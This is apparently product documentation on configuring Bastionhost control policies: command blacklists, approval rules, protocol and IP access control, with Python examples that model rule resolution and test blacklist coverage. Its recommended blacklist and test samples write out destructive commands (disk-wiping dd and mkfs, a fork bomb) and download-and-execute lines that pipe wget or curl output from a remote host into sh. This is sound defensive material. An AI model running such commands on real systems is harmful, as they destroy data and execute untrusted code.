Bastionhost:Configure a control policy

Last Updated: Mar 18, 2024

Bastionhost supports control policies. A control policy combines command control, command approval, protocol control, access control, and O&M approval rules, and is attached to the users and assets it governs. This prevents users from running high-risk commands or performing misoperations, which helps ensure O&M security.

Step 1: Create a control policy

  1. Log on to the console of a bastion host. For more information, see Log on to the console of a bastion host.

  2. In the left-side navigation pane, click Control Policies.

  3. On the Control Policies page, click Create Control Policy.

  4. On the Create Control Policy page, configure the Name, Priority, Command Control, Command Approval, Protocol Control, Access Control, and O&M Approval parameters. Then, click Create Control Policy.

    Parameter

    Description

    Name

    Specify the name for the control policy.

    • The name must be 1 to 128 characters in length.

    • The name cannot start with a special character.

    • The name can contain the following special characters: periods (.), underscores (_), hyphens (-), backslashes (\), and spaces.

    Priority

    Specify the priority of the control policy.

    • Valid values: 1 to 100. Default value: 1. A smaller value indicates a higher priority, so 1 is the highest priority.

    • Different control policies can share the same priority. If multiple policies with the same priority apply to the same user and asset, Bastionhost resolves conflicts by the type of rule that matched:

      • For command rules, the verdicts are ranked in descending order reject, allow, approve: a reject from one policy wins over an allow or approve from another at the same priority.

      • For access control rules, a blacklist takes precedence over a whitelist.

    Command Control

    Specify the commands that the users or assets to which the policy applies can or cannot run.

    • Command Control Type

      • (Blacklist) Listed Commands Are Not Allowed: If you select this option, you can leave the Commands field empty. The listed commands cannot be run by the users or on the assets to which the policy applies; every other command is allowed.

      • (Whitelist) Only Listed Commands Are Allowed: If you select this option, you must configure the Commands field. Only the listed commands can be run by the users and on the assets to which the policy applies; every other command is rejected.

    • Commands: Enter the command rules. For recommended rules, see Recommended policies for commands. A rule matches the text of the command that the user types, so a rule that names one device or path (such as /dev/hda) does not cover others (such as /dev/sda or /dev/vda); extend the recommended list to the tools and devices that are actually present on your assets.

    Command Approval

    Specify the commands that can be run only after approval.

    When a user runs a command that matches the Commands field in the Command Approval (Optional) step, the command is held until an administrator approves or rejects it in the console of the bastion host. Only approved commands run. For more information, see Approve commands.

    A command approval policy applies only to commands that are not matched by the whitelist or blacklist of a command control policy: command control is evaluated first and takes precedence over command approval. A command that is both blacklisted and listed for approval is rejected without an approval request.

    Protocol Control

    Configure the RDP Options, SSH Options, and SFTP Options fields.

    After you select required options, the users to which the policy applies can perform the operations based on the selected options. For example, if you select File Upload, the users can upload files.

    Important
    • You must select at least one of the SSH Channel and SFTP Channel options. If you clear SSH Channel, SSH-based logon is disabled for all accounts to which the policy applies. Proceed with caution.

    • If you enable Enable Only SFTP Permission for a host account, do not disable SSH Channel and SFTP Channel for the host account in a control policy. Otherwise, the host account cannot be used to access the required server by using the bastion host.

    Access Control

    Specify whether a connection from a given source IP address can access the assets to which the policy applies.

    • (Whitelist) Only Listed IP Addresses Are Allowed: If you select this option, you must configure the IP Addresses field. Users can use only the source IP addresses in a whitelist to access the assets to which the policy applies.

    • (Blacklist) Listed IP Addresses Are Not Allowed: If you select this option, you can leave the IP Addresses field empty. Users cannot use the source IP addresses in a blacklist to access the assets to which the policy applies.

    O&M Approval

    After O&M Approval is enabled, an O&M engineer can log on to the required assets and perform O&M operations only after a Bastionhost administrator approves the O&M application. For more information, see Review an O&M application.

Step 2: Associate the control policy with assets and users

On the Assets and Users to Which Policy Is Attached page, you must associate the control policy with assets and users for the policy to take effect on the assets and users.

  1. Associate the control policy with assets. You can select Takes Effect on All Assets or Takes Effect on Selected All Assets.

    • If you select Takes Effect on All Assets, the control policy takes effect on all accounts of all assets.

    • If you select Takes Effect on Selected All Assets, after you select assets that you want to associate, you can select Associate All Accounts or Associate Specific Accounts.

    Note

    If you want to associate a control policy with multiple assets or asset accounts at a time, add the assets to an asset group in one operation and then associate the control policy with the group.

  2. Associate the control policy with users. You can select Apply to All Users or Apply to Selected Users.
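The following model, which is an added example and not Bastionhost code, makes the resolution rules of Step 1 concrete: priority 1 is highest, a policy only takes effect on the users and assets it is attached to, command control is evaluated before command approval, equal-priority command verdicts are ranked reject > allow > approve, and for access control a blacklist beats a whitelist. Two things are assumptions rather than statements on the page: command patterns are treated as regular expressions searched in the typed command line, and access-control entries are compared with the source IP address as exact strings. The policies, users, assets and addresses are constructed for the example.

```python
"""Model of the control-policy resolution rules described on this page.

Added example, not Bastionhost code. Assumptions (not stated on the page):
command patterns are regular expressions searched anywhere in the typed
command line; access-control entries are exact-string IP comparisons.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

REJECT, ALLOW, APPROVE = "reject", "allow", "approve"
# Within one priority, command verdicts rank reject > allow > approve.
VERDICT_RANK = {REJECT: 0, ALLOW: 1, APPROVE: 2}


@dataclass
class Policy:
    name: str
    priority: int = 1                    # 1..100; 1 is the highest priority
    command_mode: Optional[str] = None   # "blacklist", "whitelist" or None
    commands: list = field(default_factory=list)
    approval_commands: list = field(default_factory=list)
    ip_mode: Optional[str] = None        # "blacklist", "whitelist" or None
    ip_addresses: list = field(default_factory=list)
    users: Optional[set] = None          # None = attached to all users
    assets: Optional[set] = None         # None = attached to all assets

    def applies_to(self, user: str, asset: str) -> bool:
        """A policy only takes effect on the users and assets it is attached to."""
        return (self.users is None or user in self.users) and (
            self.assets is None or asset in self.assets)


def _matches(patterns, text: str) -> bool:
    return any(re.search(p, text) for p in patterns)


def command_verdict(policy: Policy, cmdline: str) -> Optional[str]:
    """One policy's verdict for one command line; None if the policy is silent.
    Command control (blacklist/whitelist) is checked before command approval."""
    listed = _matches(policy.commands, cmdline)
    if policy.command_mode == "blacklist" and listed:
        return REJECT
    if policy.command_mode == "whitelist" and listed:
        return ALLOW
    if _matches(policy.approval_commands, cmdline):
        return APPROVE
    if policy.command_mode == "whitelist":
        return REJECT                    # not whitelisted, not approval-gated
    return None


def resolve_command(policies, user, asset, cmdline):
    """Highest priority (lowest number) wins; ties broken by verdict rank.
    Returns (verdict, name of the deciding policy)."""
    ranked = []
    for p in policies:
        if p.applies_to(user, asset):
            v = command_verdict(p, cmdline)
            if v is not None:
                ranked.append((p.priority, VERDICT_RANK[v], v, p.name))
    if not ranked:
        return ALLOW, None               # no attached policy constrains it
    ranked.sort()
    return ranked[0][2], ranked[0][3]


def resolve_access(policies, user, asset, src_ip):
    """Source-IP check: at equal priority a blacklist hit beats a whitelist."""
    ranked = []
    for p in policies:
        if not p.applies_to(user, asset) or p.ip_mode is None:
            continue
        listed = src_ip in p.ip_addresses
        if p.ip_mode == "blacklist" and listed:
            ranked.append((p.priority, 0, REJECT, p.name))
        elif p.ip_mode == "whitelist":
            ranked.append((p.priority, 1, ALLOW if listed else REJECT, p.name))
    if not ranked:
        return ALLOW, None
    ranked.sort()
    return ranked[0][2], ranked[0][3]


# Constructed scenario: a low-priority baseline for everyone plus a narrow,
# high-priority whitelist for one engineer on one host.
POLICIES = [
    Policy("baseline", priority=10, command_mode="blacklist",
           commands=[r"mkfs\.ext3", r"dd if=/dev/zero of=/dev/"],
           approval_commands=[r"^reboot\b", r"^shutdown\b", r"^rm -rf\b"],
           ip_mode="blacklist", ip_addresses=["203.0.113.9"]),
    Policy("alice-web01", priority=1, command_mode="whitelist",
           commands=[r"^reboot\b", r"^systemctl status\b"],
           users={"alice"}, assets={"web-01"}),
]

if __name__ == "__main__":
    for user, cmd in [("alice", "reboot"), ("bob", "reboot"),
                      ("alice", "rm -rf /tmp/x"), ("bob", "mkfs.ext3 /dev/sdb")]:
        print(user, repr(cmd), "->", resolve_command(POLICIES, user, "web-01", cmd))
    print("bob from 203.0.113.9 ->", resolve_access(POLICIES, "bob", "web-01", "203.0.113.9"))
```

Running the scenario shows the two effects worth checking before rolling a policy out: alice's priority-1 whitelist lets her reboot web-01 without approval while bob, who only has the baseline, gets an approval request for the same command, and that same whitelist rejects her rm -rf outright because a whitelist at higher priority overrides the baseline's approval rule.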

Recommended policies for commands

The following lists describe commands that are commonly restricted, what each command does, and the recommended policy for it. Configure the Command Control (Optional) and Command Approval (Optional) steps accordingly. Several entries are written as patterns rather than literal command names (for example (wget)(|.*)(-O- \| sh)); adapt device names and paths to your assets, because a rule that names /dev/hda does not cover /dev/sda or /dev/vda, and a rule for wget does not cover curl.

Commands that should require approval before they can be run:

• reboot - Restarts the system.

• restart - Restarts the system.

• shutdown - Shuts down the system.

• halt - Shuts down the system.

• poweroff - Shuts down the system.

• init 0 - Switches to runlevel 0, which stops the system.

• pkill - Terminates multiple processes at a time.

• kill - Terminates a single process.

• rm -rf - Recursively and forcibly deletes directories without prompting.

• mount - Mounts a file system. Mounted media can introduce malware onto the host.

• umount - Unmounts a file system.

• parted - Partitions a disk.

Commands that should be added to the blacklist:

• format - Formats the disk.

• dd if=/dev/zero of=/dev/hda - Overwrites the disk with zeros.

• :(){:|:&};: - Creates a fork bomb.

• (mv)(|.*)(/dev/null) - Moves a file or directory to /dev/null, destroying it.

• (wget)(|.*)(-O- \| sh) - Downloads a file and immediately executes it.

• mkfs.ext3 * - Formats the disk.

• dd if=/dev/random of=/dev/* - Overwrites a block device with random data.
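The following check, which is an added example and not Bastionhost code, takes the recommended rules above verbatim (with the device name corrected to /dev/hda) and runs a set of constructed command lines through them, blacklist first and approval list second as the page's precedence rule requires. It assumes the rules are regular expressions searched anywhere in the typed command line, which is what their syntax suggests; the command lines and the host address in them are constructed for the example. The point is to surface both the destructive commands the list as written does not catch and one harmless command it does catch, before the list is deployed.

```python
"""Coverage check for the recommended command rules above.

Added example, not Bastionhost code. Assumes each rule is a regular expression
searched anywhere in the typed command line. Sample command lines are constructed.
"""
import re

# Blacklist rules copied from the list above (device name corrected to /dev/hda).
BLACKLIST = [
    "format",
    "dd if=/dev/zero of=/dev/hda",
    ":(){:|:&};:",
    "(mv)(|.*)(/dev/null)",
    r"(wget)(|.*)(-O- \| sh)",
    "mkfs.ext3 *",
    "dd if=/dev/random of=/dev/*",
]
# Approval rules copied from the list above.
APPROVAL = ["reboot", "restart", "shutdown", "halt", "poweroff", "init 0",
            "pkill", "kill", "rm -rf", "mount", "umount", "parted"]


def classify(cmdline, blacklist=BLACKLIST, approval=APPROVAL):
    """Return ("reject", rule), ("approve", rule) or ("allow", None).
    The blacklist is checked first: command control precedes command approval."""
    for rule in blacklist:
        if re.search(rule, cmdline):
            return "reject", rule
    for rule in approval:
        if re.search(rule, cmdline):
            return "approve", rule
    return "allow", None


# Constructed command lines with the verdict the rules above produce for each.
SAMPLES = [
    ("reboot", "approve"),
    ("systemctl restart nginx", "approve"),
    ("rm -rf /var/tmp/build", "approve"),
    ("mkfs.ext3 /dev/sdb1", "reject"),
    (":(){:|:&};:", "reject"),
    ("wget http://203.0.113.5/x.sh -O- | sh", "reject"),
    # Gaps: destructive, but the rules as written let them through.
    ("dd if=/dev/zero of=/dev/sda", "allow"),
    ("mkfs.ext4 /dev/sdb1", "allow"),
    ("curl -s http://203.0.113.5/x.sh | sh", "allow"),
    ("wget -qO- http://203.0.113.5/x.sh | bash", "allow"),
    # Over-match: a harmless log rotation is blocked by the mv rule.
    ("mv app.log app.log.1 2>/dev/null", "reject"),
]


def coverage_report(samples=SAMPLES):
    """Map each sample command line to its verdict, checking the expectation."""
    report = {}
    for cmd, expected in samples:
        verdict, rule = classify(cmd)
        assert verdict == expected, (cmd, verdict, rule)
        report[cmd] = verdict
    return report


def gaps(samples=SAMPLES):
    """Sample command lines that pass as 'allow' although they are destructive."""
    return [cmd for cmd, verdict in coverage_report(samples).items()
            if verdict == "allow"]


if __name__ == "__main__":
    for cmd, verdict in coverage_report().items():
        print(f"{verdict:8} {cmd}")
    print("not covered by the list as written:", gaps())
```

Every command in gaps() needs an additional rule before the list is useful on current hosts: the dd and mkfs rules are tied to one device name and one file-system type, and the download-and-execute rule matches only one wget spelling. The mv over-match shows the other side of broad patterns, so a whitelist exception or a tighter rule is needed for shell redirection to /dev/null.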